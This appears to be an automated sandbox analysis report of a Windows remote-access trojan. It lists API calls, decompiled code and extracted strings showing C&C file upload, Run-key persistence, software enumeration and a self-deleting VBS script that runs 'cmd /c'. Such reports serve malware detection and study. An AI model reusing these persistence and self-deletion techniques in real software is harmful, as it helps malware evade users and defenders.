                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 013B864F
                                            • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 013B866F
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 013B8678
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 013B8698
                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 013B86B6
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 013B86BE
                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 013B86C6
                                            • SetFileAttributesW.KERNEL32(?,00000080), ref: 013B86E3
                                            • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(013CBC68,013C5800), ref: 013B86F7
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 013B8709
                                            • SetFileAttributesW.KERNEL32(00000000), ref: 013B8710
                                              • Part of subcall function 013B6D41: TerminateThread.KERNEL32(013B528A,00000000,?,?,013B85CD), ref: 013B6D56
                                              • Part of subcall function 013B6D41: UnhookWindowsHookEx.USER32(00000000), ref: 013B6D5F
                                              • Part of subcall function 013B6D41: TerminateThread.KERNEL32(013B526A,00000000,?,?,013B85CD), ref: 013B6D6F
                                            • _wgetenv.MSVCRT ref: 013B8720
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 013B872B
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 013B8736
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B8741
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 013B8753
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 013B8763
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B876E
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 013B878D
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 013B879D
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 013B87AA
                                            • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013B87B6
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B87BF
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B87C8
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B87D1
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,013C6354), ref: 013B87F0
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 013B87FB
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 013B8808
                                            • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013B8814
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B881D
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B8826
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B882F
                                            • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 013B8843
                                            • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(013CBC68,013C5800), ref: 013B8850
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",013CBC68,013C6354), ref: 013B8867
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,013C6354), ref: 013B8874
                                            • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,013C6354), ref: 013B8880
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,013C6354), ref: 013B8889
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,013C6354), ref: 013B8892
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,013C623C), ref: 013B88A9
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",00000000,?,00000000), ref: 013B88C0
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013B88CB
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013B88D8
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 013B88E5
                                            • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013B88F1
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B88FA
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B8903
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B890C
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B8915
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B891E
                                            • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 013B892C
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 013B8938
                                            • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 013B8942
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 013B894E
                                              • Part of subcall function 013C2D56: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,013C623C), ref: 013C2D93
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(013C5800,013C5800,00000000), ref: 013B8967
                                            • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 013B8974
                                            • exit.MSVCRT ref: 013B8980
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B8989
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B8992
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B899B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$G@2@@0@V?$basic_string@$?c_str@?$basic_string@Hstd@@$??0?$basic_string@G@1@@V01@V10@Y?$basic_string@$D@2@@std@@D@std@@FileV01@@$TerminateV10@@$??9std@@AttributesThreadV10@0@$?length@?$basic_string@?size@?$basic_string@CreateDeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                            • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                            • API String ID: 1819783940-1536747724
                                            • Opcode ID: f78195a1e836bf5cb0595d07065a3afad752ce3b5df51e39773e017e391bf688
                                            • Instruction ID: 750cac978b15e7166246e37d4050bc61710311657de439b01c610e670e5eea60
                                            • Opcode Fuzzy Hash: f78195a1e836bf5cb0595d07065a3afad752ce3b5df51e39773e017e391bf688
                                            • Instruction Fuzzy Hash: ABB184B2A00109AFDB15EBA4ED89EEE777CEF64709F540019F502E2145EB757E08CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B3816, Relevance: 91.3, APIs: 50, Strings: 2, Instructions: 302fileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 013B2038: socket.WS2_32(00000000,00000001,00000006), ref: 013B2053
                                            • CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000,?,Function_0001B310,00000000), ref: 013B3845
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013B385C
                                              • Part of subcall function 013B20C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,013CBE70,?,013BCF62,0000004B), ref: 013B20D1
                                              • Part of subcall function 013B20C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B20E7
                                            • GetFileSize.KERNEL32(00000000,?,?,Function_0001B310,00000000), ref: 013B387B
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 013B38AA
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 013B38C8
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 013B38D9
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B38EA
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B38F3
                                            • ??2@YAPAXI@Z.MSVCRT ref: 013B3940
                                            • SetFilePointer.KERNEL32(?,?,?,?), ref: 013B3954
                                            • ReadFile.KERNEL32(?,?,0000FDE8,?,?), ref: 013B3968
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 013B3978
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?), ref: 013B398E
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B3B9B
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B3BA4
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B3BAD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$File$G@2@@std@@G@std@@$D@1@@G@1@@V01@@$??2@CreateD@2@@0@Hstd@@PointerReadSizeV10@@V?$basic_string@socket
                                            • String ID: Uploading file to C&C: $[INFO]
                                            • API String ID: 368904453-3151135581
                                            • Opcode ID: 48b78b43fa03ee0ae71a328d9e29a0c4719ff925c69a1b5cb3f5900d14d7450d
                                            • Instruction ID: ab8aa689cb5a05200954fd03e18e73a65376e5e8626cd412c8953803c9482e5b
                                            • Opcode Fuzzy Hash: 48b78b43fa03ee0ae71a328d9e29a0c4719ff925c69a1b5cb3f5900d14d7450d
                                            • Instruction Fuzzy Hash: 63C10571D0011AAFDF15EFA4EC88EEEBB7CEF14709F104169E516A2150EB71AA49CB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C30BF, Relevance: 86.0, APIs: 42, Strings: 7, Instructions: 239registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 013C30DF
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(013C5800,?), ref: 013C30F5
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 013C3116
                                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 013C3135
                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 013C3160
                                            • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 013C31DD
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,013C6AFC,?,013C6AFC,?,013C6AFC,?,013C6AFC,?,013C6AFC,?,013C6AFC,013C623C), ref: 013C321D
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,013C6AFC,013C623C), ref: 013C322D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@G@1@@G@2@@0@Hstd@@OpenV?$basic_string@$?empty@?$basic_string@EnumV10@V10@0@
                                            • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                            • API String ID: 1820998543-3714951968
                                            • Opcode ID: bc15bbbff3e9904093b3920814e0fbf8611485c65e8869e2ae1cb0bc248f16bd
                                            • Instruction ID: fb3054421bd6826c92ec79d728decfce884b3531583b67c9806f4fd827c509b2
                                            • Opcode Fuzzy Hash: bc15bbbff3e9904093b3920814e0fbf8611485c65e8869e2ae1cb0bc248f16bd
                                            • Instruction Fuzzy Hash: 3191CBB2900119AFCF25EB90DD99EEEBB7CFF14708F440059F606A2154EA756B49CFA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013BA906, Relevance: 77.3, APIs: 39, Strings: 5, Instructions: 271sleepsynchronizationstringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateMutexA.KERNEL32(00000000,00000001,013CBA38,013CBCB0,00000000), ref: 013BA91D
                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 013BA930
                                            • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 013BA93D
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 013BA946
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 013BA965
                                              • Part of subcall function 013BB692: RegOpenKeyExA.KERNELBASE(80000001,013B936A,00000000,00020019,013B936A), ref: 013BB6AC
                                              • Part of subcall function 013BB692: RegQueryValueExA.KERNELBASE(013B936A,?,00000000,00000000,?,?,013CBCC0), ref: 013BB6C8
                                              • Part of subcall function 013BB692: RegCloseKey.KERNELBASE(013B936A), ref: 013BB6D3
                                            • exit.MSVCRT ref: 013BA97F
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 013BA98C
                                            • exit.MSVCRT ref: 013BA9A9
                                            • OpenProcess.KERNEL32(00100000,00000000,80000001), ref: 013BA9B8
                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 013BA9C4
                                            • CloseHandle.KERNEL32(80000001), ref: 013BA9CD
                                            • GetCurrentProcessId.KERNEL32 ref: 013BA9D3
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,00000000), ref: 013BA9E1
                                            • PathFileExistsW.SHLWAPI(?), ref: 013BAA00
                                            • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 013BAA15
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 013BAA1F
                                            • GetTempPathW.KERNEL32(00000104,?), ref: 013BAA63
                                            • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 013BAA7E
                                            • lstrcatW.KERNEL32(?,.exe), ref: 013BAA90
                                            • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 013BAAA2
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 013BAAAC
                                              • Part of subcall function 013C2D56: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,013C623C), ref: 013C2D93
                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 013BAAD2
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(013C6524,80000001), ref: 013BAAE4
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(013C6524), ref: 013BAAFE
                                            • Sleep.KERNEL32(000001F4), ref: 013BAB15
                                            • exit.MSVCRT ref: 013BAB2A
                                            • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(013CBA28,013C5800,00000000,80000001,013CBA38), ref: 013BAB4C
                                            • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 013BAB78
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 013BAB81
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000410,00000000), ref: 013BAB9E
                                            • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(?), ref: 013BABC2
                                            • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(013CBA28,013C5800), ref: 013BABD2
                                            • Sleep.KERNEL32(00000BB8), ref: 013BABF9
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 013BAC0D
                                              • Part of subcall function 013B7D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,013C5628,013CBA28,013C5628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,013CBA28,013C5A24,?,013B8003), ref: 013B7D7A
                                              • Part of subcall function 013B7D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,013C5628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,013CBA28,013C5A24,?,013B8003), ref: 013B7D84
                                              • Part of subcall function 013B7D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013C5628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe), ref: 013B7DA4
                                              • Part of subcall function 013B7D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,013C5628,013CBA28,013C5628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,013CBA28,013C5A24), ref: 013B7DBE
                                              • Part of subcall function 013B7D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,013C5628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,013CBA28,013C5A24), ref: 013B7DC8
                                              • Part of subcall function 013B7D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013C5628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe), ref: 013B7DE8
                                              • Part of subcall function 013B7D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,013C5628,013CBA28,013C5628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,013CBA28,013C5A24), ref: 013B7E02
                                              • Part of subcall function 013B7D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,013C5628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,013CBA28,013C5A24), ref: 013B7E0C
                                              • Part of subcall function 013B7D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013C5628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe), ref: 013B7E2C
                                            • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 013BAC32
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 013BAC3B
                                            • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 013BAC44
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 013BAC51
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000), ref: 013BAC62
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$?c_str@?$basic_string@$G@2@@0@V?$basic_string@$G@2@@std@@$?size@?$basic_string@Hstd@@$File$??1?$basic_string@V10@V10@@exit$??8std@@CloseCreateNameOpenPathProcessSleepTemp$??0?$basic_string@??4?$basic_string@CurrentD@1@@ExecuteExistsHandleModuleMutexObjectQueryShellSingleV01@ValueWaitlstrcat
                                            • String ID: .exe$WDH$exepath$open$temp_
                                            • API String ID: 2802067201-3088914985
                                            • Opcode ID: a48afca797b8dff8c101044649a41a3c983709025b46b1bd292a5c41a19c53fb
                                            • Instruction ID: 5c1b2a8c2c686e92391881deaa70212dd4028b497616710088f7d5c7575fcfc2
                                            • Opcode Fuzzy Hash: a48afca797b8dff8c101044649a41a3c983709025b46b1bd292a5c41a19c53fb
                                            • Instruction Fuzzy Hash: 8A91A572A402047FEB219BA49C8DFEE7B6DEB5870AF000059F746E6185EBB0B9458761
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C1D8A, Relevance: 77.2, APIs: 34, Strings: 10, Instructions: 210synchronizationCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 25%
                                            			E013C1D8A(WCHAR* __eax, char _a4, intOrPtr _a20, intOrPtr _a24, char _a27) {
				char _v20;
				char _v36;
				char _v52;
				char _v68;
				char _v84;
				char _v88;
				char* _t35;
				char* _t36;
				char* _t37;
				WCHAR* _t38;
				void* _t43;
				void* _t47;
				intOrPtr* _t50;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t86;
				intOrPtr _t87;
				intOrPtr* _t88;
				void* _t91;

				_t30 = __eax;
				__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z(0x5c, 0);
				if(__eax ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t30 = E013C35DE();
					_t91 = _t91 + 0xc;
					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t30,  &_v36, 0x30, __eax);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				if(_t30 <= 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					if(PathFileExistsW(_t30) != 0) {
						goto L4;
					} else {
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
						_t47 = E013B20C2(0x13cc178, 0xa8, 0x13c5664);
					}
				} else {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_a24, _t30);
					E013C2E4E(_t30);
					_t91 = _t91 - 0x10 + 0x14;
					L4:
					_t35 =  &_v68;
					L013C416A();
					_t36 =  &_v52;
					L013C4146();
					_t37 =  &_v36;
					L013C414C();
					_t38 =  &_v20;
					L013C4146();
